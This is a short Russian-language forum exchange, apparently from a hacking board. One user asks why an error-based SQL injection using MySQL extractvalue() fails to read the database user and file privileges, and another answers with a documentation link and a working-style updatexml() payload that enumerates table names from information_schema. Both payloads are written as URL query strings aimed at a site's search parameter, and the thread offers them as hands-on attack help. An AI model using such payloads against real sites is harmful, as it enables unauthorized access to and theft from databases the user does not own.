13.03.2014, 18:53
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от psihoz26
YaBtr
где можно почитать про extractvalue?
?query=1'*(extractvalue(1,concat(0x3a,uSer(),0x3a, file_priv)+from+mySql.uSer))*%20'&x=0&y=0
почему не работает? синтаксис у меня кривой или прав нету?
1. И синтаксис кривой и прав не хватает.
2. http://dev.mysql.com/doc/refman/5.1/en/xml-functions.html
Там же написано об updatexml.
Сообщение от None
?query=1'*(updatexml(1,concat(0x3a,(Select+table_n ame+from+information_Schema.tableS limit 1)),4))*'&x=0&y=0
|
|
|